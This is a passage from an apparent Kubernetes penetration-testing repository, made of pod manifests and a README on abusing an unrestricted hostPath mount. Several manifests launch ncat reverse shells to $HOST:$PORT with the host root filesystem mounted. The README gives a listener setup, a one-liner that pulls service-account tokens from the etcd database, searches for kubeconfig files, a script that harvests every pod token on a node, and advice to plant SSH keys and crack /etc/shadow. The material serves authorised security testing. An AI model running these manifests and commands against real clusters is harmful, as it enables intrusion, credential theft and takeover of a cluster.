control-plane node name 15 | 16 | -------------------------------------------------------------------------------- /manifests/hostnetwork/replicaset/hostnetwork-exec-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: hostnetwork-exec-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | hostNetwork: true 20 | containers: 21 | - name: hostnetwork-exec-replicaset 22 | image: ubuntu 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "while true; do sleep 30; done;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | 27 | -------------------------------------------------------------------------------- /manifests/hostnetwork/replicaset/hostnetwork-revshell-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: hostnetwork-revshell-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | hostNetwork: true 20 
| containers: 21 | - name: hostnetwork-revshell-replicaset 22 | image: raesene/ncat 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | 27 | -------------------------------------------------------------------------------- /manifests/hostnetwork/replicationcontroller/hostnetwork-exec-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: hostnetwork-exec-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | hostNetwork: true 20 | containers: 21 | - name: hostnetwork-exec-replicationcontroller 22 | image: ubuntu 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "while true; do sleep 30; done;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | 27 | -------------------------------------------------------------------------------- /manifests/hostnetwork/replicationcontroller/hostnetwork-revshell-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: hostnetwork-revshell-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | hostNetwork: true 20 | containers: 21 | - name: hostnetwork-revshell-replicationcontroller 22 | image: raesene/ncat 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | 27 | -------------------------------------------------------------------------------- /manifests/hostnetwork/statefulset/hostnetwork-exec-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: hostnetwork-exec-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: hostnetwork-exec-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: hostnetwork-exec-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | hostNetwork: true 36 | containers: 37 | - name: hostnetwork-exec-statefulset 38 | image: ubuntu 39 | command: [ "/bin/sh", "-c", "--" ] 40 | args: [ "while true; do sleep 30; done;" ] 41 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and 
changing to a control-plane node name 42 | 43 | -------------------------------------------------------------------------------- /manifests/hostnetwork/statefulset/hostnetwork-revshell-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: hostnetwork-revshell-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: hostnetwork-revshell-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: hostnetwork-revshell-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | hostNetwork: true 36 | containers: 37 | - name: hostnetwork-revshell-statefulset 38 | image: raesene/ncat 39 | command: [ "/bin/sh", "-c", "--" ] 40 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 41 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 42 | 43 | -------------------------------------------------------------------------------- /manifests/hostpath/README.md: -------------------------------------------------------------------------------- 1 | # Bad Pod #4: Unrestricted hostPath 2 | ![](../../.github/images/Pod4.jpg) 3 | 4 | In this case, even if you don’t have access to the host’s process or network namespaces, if the administrators have not limited what you can mount, you can mount / on the host into your pod, giving you read/write access to the host’s filesystem. This allows you to execute most of the same privilege escalation paths outlined above. There are so many paths available that Ian Coldwater and Duffie Cooley gave an awesome Blackhat 2019 talk about it titled The Path Less Traveled: Abusing Kubernetes Defaults! 5 | 6 | Here are some privilege escalation paths that apply anytime you have access to a Kubernetes node’s filesystem: 7 | * Look for `kubeconfig` files on the host filesystem – If you are lucky, you will find a cluster-admin config with full access to everything. 8 | * Access the tokens from all pods on the node – Use something like access-matrix to see if any of the pods have tokens that give you more permission than you currently have. Look for tokens that have permissions to get secrets in kube-system. 9 | * Add your SSH key – If you have network access to SSH to the node, you can add your public key to the node and SSH to it for full interactive access (see the sketch after this list). 10 | * Crack hashed passwords – Crack hashes in `/etc/shadow` and see if you can use them to access other nodes.
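For the SSH key path, here is a minimal sketch of what that looks like from a pod that has the node's root filesystem mounted at `/host` (the key file names are placeholders, and this assumes the node's sshd permits root logins with public keys):

```bash
# From the pod: append your public key to root's authorized_keys via the hostPath mount
mkdir -p /host/root/.ssh
cat my_key.pub >> /host/root/.ssh/authorized_keys

# Then, from your attack box:
ssh -i my_key root@<node-ip>
```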
11 | 12 | ## Table of Contents 13 | - [Pod Creation](#pod-creation) 14 | - [Exec pods](#exec-pods) 15 | - [Reverse shell pods](#reverse-shell-pods) 16 | - [Deleting resources](#deleting-resources) 17 | - [Post exploitation](#post-exploitation) 18 | - [Can you run your pod on a control-plane node](#can-you-run-your-pod-on-a-control-plane-node) 19 | - [Read secrets from etcd](#read-secrets-from-etcd) 20 | - [Look for kubeconfigs in the host filesystem](#look-for-kubeconfigs-in-the-host-filesystem) 21 | - [Grab all tokens from all pods on the system](#grab-all-tokens-from-all-pods-on-the-system) 22 | - [Some other ideas](#some-other-ideas) 23 | - [Attacks that apply to all pods, even without any special permissions](#attacks-that-apply-to-all-pods-even-without-any-special-permissions) 24 | - [Demonstrate impact](#demonstrate-impact) 25 | - [References and further reading:](#references-and-further-reading) 26 | 27 | # Pod Creation 28 | ## Exec pods 29 | Create one or more of these resource types and exec into the pod 30 | 31 | **Pod** 32 | ```bash 33 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpath/pod/hostpath-exec-pod.yaml 34 | kubectl exec -it hostpath-exec-pod -- bash 35 | ``` 36 | **Job, CronJob, Deployment, StatefulSet, ReplicaSet, ReplicationController, DaemonSet** 37 | 38 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 39 | 40 | ```bash 41 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpath/[RESOURCE_TYPE]/hostpath-exec-[RESOURCE_TYPE].yaml 42 | kubectl get pods | grep hostpath-exec-[RESOURCE_TYPE] 43 | kubectl exec -it hostpath-exec-[RESOURCE_TYPE]-[ID] -- bash 44 | ``` 45 | 46 | *Keep in mind that even if a pod security policy blocks the pod, the parent resource will still be created; the admission controller only blocks the pods that the resource tries to create.* 47 | 48 | To troubleshoot a case where you don't see pods, use `kubectl describe` 49 | 50 | ``` 51 | kubectl describe [RESOURCE_TYPE] hostpath-exec-[RESOURCE_TYPE] 52 | ``` 53 | 54 | ## Reverse shell pods 55 | Create one or more of these resources and catch the reverse shell 56 | 57 | **Step 1: Set up listener** 58 | ```bash 59 | ncat --ssl -vlp 3116 60 | ``` 61 | 62 | **Step 2: Create the pod from the local manifest without modifying it, using env variables and envsubst** 63 | 64 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 65 | * Replace the HOST and PORT values to point the reverse shell to your listener 66 | 67 | ```bash 68 | HOST="10.0.0.1" PORT="3116" envsubst < ./manifests/hostpath/[RESOURCE_TYPE]/hostpath-revshell-[RESOURCE_TYPE].yaml | kubectl apply -f - 69 | ``` 70 | 71 | **Step 3: Catch the shell and cd to /host** 72 | ```bash 73 | $ ncat --ssl -vlp 3116 74 | Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. 75 | Ncat: Listening on :::3116 76 | Ncat: Listening on 0.0.0.0:3116 77 | Connection received on 10.0.0.162 42035 78 | # cd /host 79 | ``` 80 | 81 | ## Deleting resources 82 | You can delete a resource using its manifest, or by name.
Here are some examples: 83 | ``` 84 | kubectl delete [type] [resource-name] 85 | kubectl delete -f manifests/hostpath/pod/hostpath-exec-pod.yaml 86 | kubectl delete -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpath/pod/hostpath-exec-pod.yaml 87 | kubectl delete pod hostpath-exec-pod 88 | kubectl delete cronjob hostpath-exec-cronjob 89 | ``` 90 | 91 | # Post exploitation 92 | 93 | ## Can you run your pod on a control-plane node 94 | The pod you created above was likely scheduled on a worker node. Before jumping into post exploitation on the worker node, it is worth seeing if you can run a pod on a control-plane node. If you can run your pod on a control-plane node using the `nodeName` selector in the pod spec, you might have easy access to the etcd database, which contains all of the configuration for the cluster, including all secrets. This is not possible on cloud-managed Kubernetes clusters like GKE and EKS, because they hide the control plane. 95 | 96 | **Get nodes** 97 | ``` 98 | kubectl get nodes 99 | NAME STATUS ROLES AGE VERSION 100 | k8s-control-plane Ready master 93d v1.19.1 101 | k8s-worker Ready <none> 93d v1.19.1 102 | ``` 103 | 104 | **Pick your manifest, then uncomment and update the nodeName field with the name of the control-plane node** 105 | ``` 106 | nodeName: k8s-control-plane 107 | ``` 108 | **Create your pod** 109 | ``` 110 | kubectl apply -f manifests/hostpath/job/hostpath-exec-job.yaml 111 | ``` 112 | 113 | ### Read secrets from etcd 114 | If you can run your pod on a control-plane node using the `nodeName` selector in the pod spec, you might have easy access to the `etcd` database, which contains all of the configuration for the cluster, including all secrets. 115 | 116 | Below is a quick and dirty way to grab secrets from `etcd` if it is running on the control-plane node you are on. If you want a more elegant solution that spins up a pod with the `etcd` client utility `etcdctl` and uses the control-plane node's credentials to connect to etcd wherever it is running, check out [this example manifest](https://github.com/mauilion/blackhat-2019/blob/master/etcd-attack/etcdclient.yaml) from @mauilion. 117 | 118 | **Check to see if `etcd` is running on the control-plane node and see where the database is (this is on a `kubeadm`-created cluster)** 119 | ``` 120 | root@k8s-control-plane:/var/lib/etcd/member/wal# ps -ef | grep etcd | sed s/\-\-/\\n/g | grep data-dir 121 | ``` 122 | Output: 123 | ``` 124 | data-dir=/var/lib/etcd 125 | ``` 126 | **View the data in the etcd database:** 127 | ``` 128 | strings /var/lib/etcd/member/snap/db | less 129 | ``` 130 | 131 | **Extract the tokens from the database and show the service account name** 132 | ``` 133 | db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done 134 | ``` 135 | 136 | **Same command, but with some greps to only return the default token in the kube-system namespace** 137 | ``` 138 | db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done | grep kube-system | grep default 139 | ``` 140 | Output: 141 | ``` 142 | 1/registry/secrets/kube-system/default-token-d82kb | eyJhbGciOiJSUzI1NiIsImtpZCI6IkplRTc0X2ZP[REDACTED] 143 | ``` 144 | 145 |
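Once you have extracted a token, a quick way to see what it is allowed to do is to hand it to `kubectl`. A minimal sketch, assuming `kubectl` in your pod already points at the cluster's API server; `$TOKEN` stands for the JWT value you pulled out of the database above:

```bash
TOKEN="eyJhbGciOiJSUzI1NiIsImtpZCI6..."   # JWT extracted from etcd (truncated placeholder)
kubectl --token="$TOKEN" auth can-i --list -n kube-system
kubectl --token="$TOKEN" get secrets -n kube-system
```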
146 | ## Look for kubeconfigs in the host filesystem 147 | 148 | By default, nodes don't have `kubectl` installed. If you are lucky though, an administrator tried to make their life (and yours) a little easier by installing `kubectl` and their highly privileged credentials on the node. (We're not so lucky on this GKE node.) 149 | 150 | **Some ideas:** 151 | ```bash 152 | find / -name kubeconfig 153 | find / -name .kube 154 | grep -R "current-context" /home/ 155 | grep -R "current-context" /root/ 156 | ``` 157 | 158 | ## Grab all tokens from all pods on the system 159 | You can access any secret mounted within any pod on the node you are on. In a production cluster, even on a worker node, there is usually at least one pod with a mounted *token* that is bound to a *service account* that is bound to a *clusterrolebinding* that gives you access to do things like create pods or view secrets in all namespaces. 160 | 161 | Look for tokens that have permissions to get secrets in kube-system. 162 | 163 | 164 | **Copy the `can-they.sh` helper script to the pod, download it from github, or manually create it** 165 | ``` 166 | kubectl cp scripts/can-they.sh hostpath-exec-pod:/ 167 | ``` 168 | 169 | **What does `can-they.sh` do?** (a simplified sketch of its core loop appears after the ideas list below) 170 | * Installs curl and kubectl in the pod (if not installed) 171 | * Grabs all of the tokens from `/host/var/lib/kubelet/pods/*` 172 | * Loops each token against the `selfsubjectaccessreviews` endpoint: `kubectl --token=$token auth can-i [$user-input]` 173 | 174 | **Exec into pod (don't chroot)** 175 | ``` 176 | kubectl exec -it hostpath-exec-pod -- bash 177 | ``` 178 | 179 | **Run `can-they.sh`** 180 | ``` 181 | ./can-they.sh 182 | ./can-they.sh -i "--list -n kube-system" 183 | ./can-they.sh -i "--list -n default" 184 | ./can-they.sh -i "list secrets -n kube-system" 185 | ./can-they.sh -i "create pods -n kube-system" 186 | ./can-they.sh -i "create clusterrolebindings" 187 | ``` 188 | 189 | **Example run on AKS showing that gatekeeper-admin-token-jmw8z can list secrets in kube-system** 190 | ``` 191 | root@aks-agentpool-76920337-vmss000000:/# ./can-they.sh -i "list secrets -n kube-system" 192 | -------------------------------------------------------- 193 | Token Location: /host/var/lib/kubelet/pods/c888d3a8-743e-41dd-8464-91b3e6628174/volumes/kubernetes.io~secret/gatekeeper-admin-token-jmw8z/token 194 | Command: kubectl auth can-i list secrets -n kube-system 195 | yes 196 | 197 | -------------------------------------------------------- 198 | Token Location: /host/var/lib/kubelet/pods/d13e311b-affa-4fad-b1c4-ec4f7817fd98/volumes/kubernetes.io~secret/metrics-server-token-ftxxd/token 199 | Command: kubectl auth can-i list secrets -n kube-system 200 | no 201 | 202 | ...omitted for brevity... 203 | ``` 204 | 205 | **Can any of the tokens:** 206 | * Create a pod, deployment, etc. in the kube-system namespace? 207 | * Create a role in the kube-system namespace? 208 | * View secrets in the kube-system namespace? 209 | * Create clusterrolebindings? 210 | 211 | You are looking for a way to access all resources in all namespaces. 212 | 213 | 214 | ## Some other ideas 215 | * Add your public key to authorized_keys on the node and SSH to it 216 | * Crack passwords in /etc/shadow, and see if you can use them to access control-plane nodes 217 | * Look at the volumes that each of the pods have mounted. You might find some pretty sensitive stuff in there.
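For reference, the core loop that `can-they.sh` automates can be sketched in a few lines of bash (simplified; the real script also installs `curl` and `kubectl` and takes the `can-i` arguments as input):

```bash
# Try every service account token mounted into pods on this node against
# the SelfSubjectAccessReview API via `kubectl auth can-i`
for t in /host/var/lib/kubelet/pods/*/volumes/kubernetes.io~secret/*/token; do
  echo "--------------------------------------------------------"
  echo "Token Location: $t"
  kubectl --token="$(cat "$t")" auth can-i list secrets -n kube-system
done
```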
218 | 219 | ## Attacks that apply to all pods, even without any special permissions 220 | 221 | **To see these in more detail, head over to [nothing-allowed/README.md](../nothing-allowed)** 222 | 223 | * Access the cloud metadata service 224 | * `Kube-apiserver` or `kubelet` with `anonymous-auth` enabled 225 | * Kubernetes exploits 226 | * Hunting for vulnerable application/services in the cluster 227 | 228 | 229 | # Demonstrate impact 230 | 231 | If you are performing a penetration test, the end goal is not to gain cluster-admin, but rather to demonstrate the impact of exploitation. Use the access you have gained to accomplish the objectives of the penetration test. 232 | 233 | 234 | # References and further reading: 235 | * The Path Less Traveled: Abusing Kubernetes Defaults - [Talk](https://www.youtube.com/watch?v=HmoVSmTIOxM) / [Repository](https://github.com/mauilion/blackhat-2019) 236 | * [The Most Pointless Kubernetes Command Ever](https://raesene.github.io/blog/2019/04/01/The-most-pointless-kubernetes-command-ever/) 237 | * [Secure Kubernetes - KubeCon NA 2019 CTF](https://securekubernetes.com/) 238 | * Command and KubeCTL: Real-World Kubernetes Security for Pentesters - [Talk](https://www.youtube.com/watch?v=cRbHILH4f0A) / [Blog](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/) 239 | * Compromising Kubernetes Cluster by Exploiting RBAC Permissions - [Talk](https://www.youtube.com/watch?v=1LMo0CftVC4) / [Slides](https://published-prd.lanyonevents.com/published/rsaus20/sessionsFiles/18100/2020_USA20_DSO-W01_01_Compromising%20Kubernetes%20Cluster%20by%20Exploiting%20RBAC%20Permissions.pdf) 240 | 241 | 242 | -------------------------------------------------------------------------------- /manifests/hostpath/cronjob/hostpath-exec-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: hostpath-exec-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | containers: 15 | - name: hostpath-exec-cronjob 16 | image: ubuntu 17 | volumeMounts: 18 | - mountPath: /host 19 | name: noderoot 20 | command: [ "/bin/sh", "-c", "--" ] 21 | args: [ "while true; do sleep 30; done;" ] 22 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 23 | volumes: 24 | - name: noderoot 25 | hostPath: 26 | path: / 27 | restartPolicy: OnFailure 28 | -------------------------------------------------------------------------------- /manifests/hostpath/cronjob/hostpath-revshell-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: hostpath-revshell-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | containers: 15 | - name: hostpath-revshell-cronjob 16 | image: raesene/ncat 17 | volumeMounts: 18 | - mountPath: /host 19 | name: noderoot 20 | command: [ "/bin/sh", "-c", "--" ] 21 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 22 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 23 | volumes: 24 | - name: noderoot 25 | hostPath: 26 | path: / 27 | 
restartPolicy: OnFailure 28 | -------------------------------------------------------------------------------- /manifests/hostpath/deamonset/hostpath-exec-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: hostpath-exec-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | containers: 20 | - name: hostpath-exec-daemonset 21 | image: ubuntu 22 | volumeMounts: 23 | - mountPath: /host 24 | name: noderoot 25 | command: [ "/bin/sh", "-c", "--" ] 26 | args: [ "while true; do sleep 30; done;" ] 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 28 | volumes: 29 | - name: noderoot 30 | hostPath: 31 | path: / 32 | -------------------------------------------------------------------------------- /manifests/hostpath/deamonset/hostpath-revshell-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: hostpath-revshell-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | containers: 20 | - name: hostpath-revshell-daemonset 21 | image: raesene/ncat 22 | volumeMounts: 23 | - mountPath: /host 24 | name: noderoot 25 | command: [ "/bin/sh", "-c", "--" ] 26 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 28 | volumes: 29 | - name: noderoot 30 | hostPath: 31 | path: / 32 | -------------------------------------------------------------------------------- /manifests/hostpath/deployment/hostpath-exec-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: hostpath-exec-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | containers: 21 | - name: hostpath-exec-deployment 22 | image: ubuntu 23 | volumeMounts: 24 | - mountPath: /host 25 | name: noderoot 26 | command: [ "/bin/sh", "-c", "--" ] 27 | args: [ "while true; do sleep 30; done;" ] 28 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 29 | volumes: 30 | - name: noderoot 31 | hostPath: 32 | path: / 33 | -------------------------------------------------------------------------------- /manifests/hostpath/deployment/hostpath-revshell-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: hostpath-revshell-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | 
labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | containers: 21 | - name: hostpath-revshell-deployment 22 | image: raesene/ncat 23 | volumeMounts: 24 | - mountPath: /host 25 | name: noderoot 26 | command: [ "/bin/sh", "-c", "--" ] 27 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 28 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 29 | volumes: 30 | - name: noderoot 31 | hostPath: 32 | path: / 33 | -------------------------------------------------------------------------------- /manifests/hostpath/job/hostpath-exec-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: hostpath-exec-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | containers: 12 | - name: hostpath-exec-job 13 | image: ubuntu 14 | volumeMounts: 15 | - mountPath: /host 16 | name: noderoot 17 | command: [ "/bin/sh", "-c", "--" ] 18 | args: [ "while true; do sleep 30; done;" ] 19 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 20 | volumes: 21 | - name: noderoot 22 | hostPath: 23 | path: / 24 | restartPolicy: OnFailure 25 | -------------------------------------------------------------------------------- /manifests/hostpath/job/hostpath-revshell-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: hostpath-revshell-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | containers: 12 | - name: hostpath-revshell-job 13 | image: raesene/ncat 14 | volumeMounts: 15 | - mountPath: /host 16 | name: noderoot 17 | command: [ "/bin/sh", "-c", "--" ] 18 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 19 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 20 | volumes: 21 | - name: noderoot 22 | hostPath: 23 | path: / 24 | restartPolicy: OnFailure 25 | -------------------------------------------------------------------------------- /manifests/hostpath/pod/hostpath-exec-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: hostpath-exec-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | containers: 9 | - name: hostpath-exec-pod 10 | image: ubuntu 11 | volumeMounts: 12 | - mountPath: /host 13 | name: noderoot 14 | command: [ "/bin/sh", "-c", "--" ] 15 | args: [ "while true; do sleep 30; done;" ] 16 | #nodeName: k8s-control-plane-node # Force your pod to run on a control-plane node by uncommenting this line and changing to a control-plane node name 17 | volumes: 18 | - name: noderoot 19 | hostPath: 20 | path: / 21 | -------------------------------------------------------------------------------- /manifests/hostpath/pod/hostpath-revshell-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: hostpath-revshell-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | containers: 9 | - name: hostpath-revshell-pod 10 | image: raesene/ncat 11 | volumeMounts: 12 | - mountPath: /host 13 | name: noderoot 14 | command: [ "/bin/sh", "-c", "--" ] 15 | args: [ "ncat --ssl $HOST $PORT -e 
/bin/bash;" ] 16 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 17 | volumes: 18 | - name: noderoot 19 | hostPath: 20 | path: / 21 | -------------------------------------------------------------------------------- /manifests/hostpath/replicaset/hostpath-exec-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: hostpath-exec-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | containers: 20 | - name: hostpath-exec-replicaset 21 | image: ubuntu 22 | volumeMounts: 23 | - mountPath: /host 24 | name: noderoot 25 | command: [ "/bin/sh", "-c", "--" ] 26 | args: [ "while true; do sleep 30; done;" ] 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 28 | volumes: 29 | - name: noderoot 30 | hostPath: 31 | path: / 32 | -------------------------------------------------------------------------------- /manifests/hostpath/replicaset/hostpath-revshell-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: hostpath-revshell-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | containers: 20 | - name: hostpath-revshell-replicaset 21 | image: raesene/ncat 22 | volumeMounts: 23 | - mountPath: /host 24 | name: noderoot 25 | command: [ "/bin/sh", "-c", "--" ] 26 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 28 | volumes: 29 | - name: noderoot 30 | hostPath: 31 | path: / 32 | -------------------------------------------------------------------------------- /manifests/hostpath/replicationcontroller/hostpath-exec-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: hostpath-exec-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | containers: 20 | - name: hostpath-exec-replicationcontroller 21 | image: ubuntu 22 | volumeMounts: 23 | - mountPath: /host 24 | name: noderoot 25 | command: [ "/bin/sh", "-c", "--" ] 26 | args: [ "while true; do sleep 30; done;" ] 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 28 | volumes: 29 | - name: noderoot 30 | hostPath: 31 | path: / 32 | -------------------------------------------------------------------------------- /manifests/hostpath/replicationcontroller/hostpath-revshell-replicationcontroller.yaml: 
